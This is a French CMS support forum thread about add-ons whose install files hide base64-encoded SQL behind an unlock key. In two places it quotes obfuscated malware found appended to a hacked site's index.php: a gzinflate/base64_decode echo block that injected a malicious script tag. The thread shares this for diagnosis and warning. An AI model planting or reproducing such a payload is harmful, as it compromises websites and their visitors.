salut a tous et a toutes voilà, j'ai un problème avec des moduls; patchs et blocks en provenance du site "webalain.fr" (Qui a encore fermer ces potes). J'ai beau decryper dans tous les sens impossibles de lire les requete sql coder en "base64". donc impossible d'installer les extension en question sans code de deverouillage :/

http://pastebin.com/Zu9Ka60T

très facile pourtant,
 de décoder le base64

mais ça te serviras a rien il a une autre protection juste après

Website : https://bel-cms.dev ou https://github.com/BEL-CMS/BEL-CMS-V3

Website : https://palacewar.eu

Avant d'ouvrir un sujet, n'oubliez pas de lire le règlement et faire une recherche sur le forum !

pas de problème merci

Pour info, on nous a signalé un site détecté comme malveillant par Google.

Après analyse, le fichier index.php de la racine avait été modifié et nous avons trouvé ceci à la toute fin du fichier:

#c3284d#
echo(gzinflate(base64_decode("1Vrbbhs3EP2WCqghwWhDcnlbKCrQpkGe+pQCBRrkwXWlWGhsB7LgonD9713O8DLL5
Uq7WjtJX2yC4mV45sxVenl3udt+2v+w3/3zcL95fX6+fLy82F9ezX/86bdfXy8e3Pyb339+8y9XohL+s/XfF3982K0XD9erXy
72V8v1/Wp9f/Fx+bjZrGab3e31q6uL2XKzOV/Ndq9u/1zPljerGZfCnp1xo1TzV0nW/JXWjbWQbsbAvHJjrZpPpbRhyCV305a
xuFxUblwpsgY/1XCM0M1fbmCmgjWVm6+McJ9yWFM3a7TbpAycLt2shQXhemlbo+Ym97FUcT9OS6XDC2BxzcOIG5kt4Jo3M7pm
YejFwScqFi40bNgZvGr2WXuy7IqLANuTya7U55HdM4fHY/G6Me+o3QhOU9b2YaLNwPdEiclhZK0FWtYAGeu8Ei/AQ8FWNDv6y
CrSRYwhchlkvEiD0GA6RjQnaSnDMCgalc7CE6wz2oMaGfJwm0D2BgpaIBfjFUaIY2cVzz+ZzV0m8YQIPBhu0UwMQpIrNQKQI4
YBxhDwhltNMhLiR1tUGq9hQueDZ3jvKxOYnDlBjCG4AdTMOKl4F4r82WR0UgB5okDRvCPBQ4MSPgfPR3qgCDCPMFGJPfOAMHD
6ADp7+PwdPLmKEkVbstk4zUQuJizxvKjITrgLQi1o3Tg8tIMDXAyMSnobIzgwJhcc7KItobNVtM/KJp6jhFpEfAEHJKCSSUt4
CGM2ahvfiRpD44/hH8KtAUgGP266QzEOcrjVuHONbMC1bicAZ90Fpg7eXVvdcTVDADA2s0yKbgQgs3PQM9KgBrtnqneY9o8Rr
CYxnYQN2KgjQrod4dByysLAplyCg6zyXpJwg3gIbxqF/OAANiAD4DEorTngS+tCNokksTIQx20B+5xMVyBJFswNC8cb53itiC
MZWItcjZ9OFgMSwp6c4kA0HZMwQ8I3VTkYVUblywlhxYcTYDKiJB564+MYM1Ue4BKShHBVkAasb1RhAg+eDHRP/ZdzhKYc6CJ
QNsjIQ+Ego0sKsECsZ7VIQRrwlnm6MkgNnGWel4YbFff1vfeZ8yBcQvPFTjLwpEW1H2rWju8+eCvwlbGQwxjlY8HI3Ggo7K07
kgp88stJ5pazBdexsqCANk575GVPAMNLDtI6C8ekpCjf8MycoTH7cM7r+cPy1Ad1QW1uCMeEJPUMZ23acOmypIOJK2EWFpGen
KhSmTMgrTbMlqqYyQ0iNLuOGxqYu3/lJcyEQgCS+LbxkgYCSl0qFhRSDHThXwtHe6cqRQDQFw70VRge0B5UzdoFRXCQgLjSaQ
2d92fC+XiXJ7vWSQae7ApZ5deD5lC5RrerBU0Za1TbKUjtUtBR2WVP0yy1Zch0iqXppty7VLEzFaiXvH1fZ9R0m0SQPttEb9I
3ZUVmELOnKUfxCC3bRcC0jlgRKjidWu1QEnMB0nyZSNz1PsnvYVGvx5ulD2bHdYXXVIEMUMpijK+YGEZnKHmeLAfr12wyArBN
GOXRuCdODA/HrRgJ2LK6U6AT59wyLx7j38ionmrrYalVgofbobvGNLXxUO9meRJWVaWdrTiFhEeIKkaMyNGyrnIydNoMefs6j
y2ddkDYJrI8jB4HWye5nFGOvJz8jOqrHe+AAOtP6SqmthpYe+oepq8qBpj9VJC6blPmdYgvACUpABUvNCj//9kwKAJ6NmkO/F
ub0FWUb1TCMVhVKJu/BglYlfAmOHm3VuWmj4/FNIk0ig+afg1pWito9ZwI5mR08M7Y7AOVQRcJTQuOS5ZPspLRfvKY7wxxTOh
Smxlkrg0hC/HfeAomCKbYc1WcBEYesVRtuiAcmOO2bnFO3DrFahWbRJDgSjXNDMEBoRQqr4HpdwMynlfL6HSiyKlSQQ4+K5Pp
F2qtSJeKUb/EJhBU/hVdqebB1jMWCtoGrX117+rWQL5O0n0dPFAStvgxH7DR+L6ERfnksc7SW79EiXbDs2Vdnp95FYdQFetY2
kD1uQbLMupnAuIkD2vijyO8tDYp3lsvaNAX2jReYg8N0jX6aA8WS98b9WiI91WlMFepInU7HoULTrp4PMl0uCY78IsAXxKpCN
uJ4XJQkYNVBXo9GtxQg+lrPU9Zkrh/rmS6kJ8OTaERuAwGfHKWx3S/jp59f/fp43Y/n52dzRbLq5VY3q1ms+V2M79ebG538+2
KLbffcWOqb9xoxc+3i4e/Vtvl3fnq7X63vfnwbrN5P795t33/Yr799uqccb1YLB/X9/O75t/LF/63cv8B")));
#/c3284d#

Ce qui générait une balise script et qui était reconnue comme malveillant par Google (injection de code).

Cela ressemble fortement à ce qui apparait dans le fichier install que tu nous montres.

A ta place, j'agirais avec précaution avant une investigation plus poussée
 

Suite ici: http://www.nuked-klan.org/index.php?file=Forum&page=viewtopic&forum_id=20&thread_id=3456

Avant d'ouvrir un sujet, n'oubliez pas de lire le règlement et faire une recherche sur le forum !

*c'est fiable, je vous explique vite fait le fonctionnement ( j'ai crée une partie du code, le module de téléchargement avec les clefs est a moi je les donner a Alain )

on prend tout les données a rendre "invisible" on compresse le tout

en général tout ce qui est SQL

encodage ce fait en Base64 tout simple et la clef sert a décoder les nom et paramètre de la table

mais dans la partie qu'ont voie c'est de nouveau compressé est coder en base64

* j'ai marqué fiable mais je ne peux être sur, je ne sais pas ce que Alain a compressé

comme je ne télécharger rien chez Alain, je n'est pas pu verifié

voici le fonctionnement.

Edit : je n'avais pas vu que message de queytou24, donc vaut mieux être prudent si le Virus arrive a modifié

Website : https://bel-cms.dev ou https://github.com/BEL-CMS/BEL-CMS-V3

Website : https://palacewar.eu

Avant d'ouvrir un sujet, n'oubliez pas de lire le règlement et faire une recherche sur le forum !

Donc, si j'ai bien compris, l'installation d'un module, block ou autre ne se fera que en passant via un fichier du site d'Alain pour le "décryptage" ?

Si j'ai toujours bien compris, l'installation d'un de ces addons ne fonctionnera pas si le site de Alain est HS ?

Enfin, si j'ai toujours bien compris, une petite question: quel intérêt à ce principe ?

Maintenant, j'ai peut-être tout compris de travers... dans ce cas, merci de m'expliquer et désolé pour ces questionnements

Avant d'ouvrir un sujet, n'oubliez pas de lire le règlement et faire une recherche sur le forum !

en effet tu as tout compris

j'avais crée ce système la pour évitez de retrouvé mes modules et patches sur d'autres site,

j'ai fini par abandonné ce système de clef et le donner a Alain

et oui si la base de données ou le site de Alain et HS les module et patches télécharge servent a plus rien

( il a moyen un contournée pour y parvenir quand même, même si tu as pas la clef )

Website : https://bel-cms.dev ou https://github.com/BEL-CMS/BEL-CMS-V3

Website : https://palacewar.eu

Avant d'ouvrir un sujet, n'oubliez pas de lire le règlement et faire une recherche sur le forum !

Est-ce que tu as une idée pour laquelle Alain a décidé de mettre en place ce système ?

Personnellement (et j'insiste sur ce terme), je trouve que ça va à l'encontre de l'esprit du "libre"...

Avant d'ouvrir un sujet, n'oubliez pas de lire le règlement et faire une recherche sur le forum !

Je suppose comme moi, il ne voulais pas retrouvé ses créations / Modif sur d'autre site Concurrent

ca reste du libre est gratuits ni moi ou Alain on a vendu un patches ou modules,

mais ont estime qu'ont a le droit dans tirée profit ( en visiteur ) de nos création.

( Je parle en mon nom )

Website : https://bel-cms.dev ou https://github.com/BEL-CMS/BEL-CMS-V3

Website : https://palacewar.eu

Avant d'ouvrir un sujet, n'oubliez pas de lire le règlement et faire une recherche sur le forum !

Mais est-ce que Alain - ou d'autres car je ne vise pas quelqu'un personnellement - ne distribue pas aussi les créations d'autrui ?

Avant d'ouvrir un sujet, n'oubliez pas de lire le règlement et faire une recherche sur le forum !

J'ai pas tres bien compris, si tu as 2min je suis sur TS

Website : https://bel-cms.dev ou https://github.com/BEL-CMS/BEL-CMS-V3

Website : https://palacewar.eu

Avant d'ouvrir un sujet, n'oubliez pas de lire le règlement et faire une recherche sur le forum !

Merci d'être passé sur TS, merci pour tes explications, merci pour ta disponibilité et... vive les carolos

Avant d'ouvrir un sujet, n'oubliez pas de lire le règlement et faire une recherche sur le forum !

Bonsoir,

Moi justement j'en parlais avec kipcool et l'on trouvait ce système très bizarre. Mais bon...

Surtout emmerdant en fait, car par habitude, je télécharge, installe et supprime l'archive de mon ordi quand j'en ai plus besoin. Mais à chaque fois, un peu plus tard, j'en ai besoin pour chercher un truc et boum, j'ai plus l'archive et je ne peux plus la télécharger..

Bon après, je respecte entièrement le truc. Juste pour dire quoi

j'ai envoyer un mail à Alain pour récupérer les ressources on verra bien

Citation par PePeRePeRveRs :

Pour info, on nous a signalé un site détecté comme malveillant par Google.

Après analyse, le fichier index.php de la racine avait été modifié et nous avons trouvé ceci à la toute fin du fichier:

#c3284d#
echo(gzinflate(base64_decode("1Vrbbhs3EP2WCqghwWhDcnlbKCrQpkGe+pQCBRrkwXWlWGhsB7LgonD9713O8DLL5
Uq7WjtJX2yC4mV45sxVenl3udt+2v+w3/3zcL95fX6+fLy82F9ezX/86bdfXy8e3Pyb339+8y9XohL+s/XfF3982K0XD9erXy
72V8v1/Wp9f/Fx+bjZrGab3e31q6uL2XKzOV/Ndq9u/1zPljerGZfCnp1xo1TzV0nW/JXWjbWQbsbAvHJjrZpPpbRhyCV305a
xuFxUblwpsgY/1XCM0M1fbmCmgjWVm6+McJ9yWFM3a7TbpAycLt2shQXhemlbo+Ym97FUcT9OS6XDC2BxzcOIG5kt4Jo3M7pm
YejFwScqFi40bNgZvGr2WXuy7IqLANuTya7U55HdM4fHY/G6Me+o3QhOU9b2YaLNwPdEiclhZK0FWtYAGeu8Ei/AQ8FWNDv6y
CrSRYwhchlkvEiD0GA6RjQnaSnDMCgalc7CE6wz2oMaGfJwm0D2BgpaIBfjFUaIY2cVzz+ZzV0m8YQIPBhu0UwMQpIrNQKQI4
YBxhDwhltNMhLiR1tUGq9hQueDZ3jvKxOYnDlBjCG4AdTMOKl4F4r82WR0UgB5okDRvCPBQ4MSPgfPR3qgCDCPMFGJPfOAMHD
6ADp7+PwdPLmKEkVbstk4zUQuJizxvKjITrgLQi1o3Tg8tIMDXAyMSnobIzgwJhcc7KItobNVtM/KJp6jhFpEfAEHJKCSSUt4
CGM2ahvfiRpD44/hH8KtAUgGP266QzEOcrjVuHONbMC1bicAZ90Fpg7eXVvdcTVDADA2s0yKbgQgs3PQM9KgBrtnqneY9o8Rr
CYxnYQN2KgjQrod4dByysLAplyCg6zyXpJwg3gIbxqF/OAANiAD4DEorTngS+tCNokksTIQx20B+5xMVyBJFswNC8cb53itiC
MZWItcjZ9OFgMSwp6c4kA0HZMwQ8I3VTkYVUblywlhxYcTYDKiJB564+MYM1Ue4BKShHBVkAasb1RhAg+eDHRP/ZdzhKYc6CJ
QNsjIQ+Ego0sKsECsZ7VIQRrwlnm6MkgNnGWel4YbFff1vfeZ8yBcQvPFTjLwpEW1H2rWju8+eCvwlbGQwxjlY8HI3Ggo7K07
kgp88stJ5pazBdexsqCANk575GVPAMNLDtI6C8ekpCjf8MycoTH7cM7r+cPy1Ad1QW1uCMeEJPUMZ23acOmypIOJK2EWFpGen
KhSmTMgrTbMlqqYyQ0iNLuOGxqYu3/lJcyEQgCS+LbxkgYCSl0qFhRSDHThXwtHe6cqRQDQFw70VRge0B5UzdoFRXCQgLjSaQ
2d92fC+XiXJ7vWSQae7ApZ5deD5lC5RrerBU0Za1TbKUjtUtBR2WVP0yy1Zch0iqXppty7VLEzFaiXvH1fZ9R0m0SQPttEb9I
3ZUVmELOnKUfxCC3bRcC0jlgRKjidWu1QEnMB0nyZSNz1PsnvYVGvx5ulD2bHdYXXVIEMUMpijK+YGEZnKHmeLAfr12wyArBN
GOXRuCdODA/HrRgJ2LK6U6AT59wyLx7j38ionmrrYalVgofbobvGNLXxUO9meRJWVaWdrTiFhEeIKkaMyNGyrnIydNoMefs6j
y2ddkDYJrI8jB4HWye5nFGOvJz8jOqrHe+AAOtP6SqmthpYe+oepq8qBpj9VJC6blPmdYgvACUpABUvNCj//9kwKAJ6NmkO/F
ub0FWUb1TCMVhVKJu/BglYlfAmOHm3VuWmj4/FNIk0ig+afg1pWito9ZwI5mR08M7Y7AOVQRcJTQuOS5ZPspLRfvKY7wxxTOh
Smxlkrg0hC/HfeAomCKbYc1WcBEYesVRtuiAcmOO2bnFO3DrFahWbRJDgSjXNDMEBoRQqr4HpdwMynlfL6HSiyKlSQQ4+K5Pp
F2qtSJeKUb/EJhBU/hVdqebB1jMWCtoGrX117+rWQL5O0n0dPFAStvgxH7DR+L6ERfnksc7SW79EiXbDs2Vdnp95FYdQFetY2
kD1uQbLMupnAuIkD2vijyO8tDYp3lsvaNAX2jReYg8N0jX6aA8WS98b9WiI91WlMFepInU7HoULTrp4PMl0uCY78IsAXxKpCN
uJ4XJQkYNVBXo9GtxQg+lrPU9Zkrh/rmS6kJ8OTaERuAwGfHKWx3S/jp59f/fp43Y/n52dzRbLq5VY3q1ms+V2M79ebG538+2
KLbffcWOqb9xoxc+3i4e/Vtvl3fnq7X63vfnwbrN5P795t33/Yr799uqccb1YLB/X9/O75t/LF/63cv8B")));
#/c3284d#

Ce qui générait une balise script et qui était reconnue comme malveillant par Google (injection de code).

Cela ressemble fortement à ce qui apparait dans le fichier install que tu nous montres.

A ta place, j'agirais avec précaution avant une investigation plus poussée
 

Suite ici: http://www.nuked-klan.org/index.php?file=Forum&page=viewtopic&forum_id=20&thread_id=3456

j'ai eu le même problème sous mon site "Wordpress" foutu Hacker x)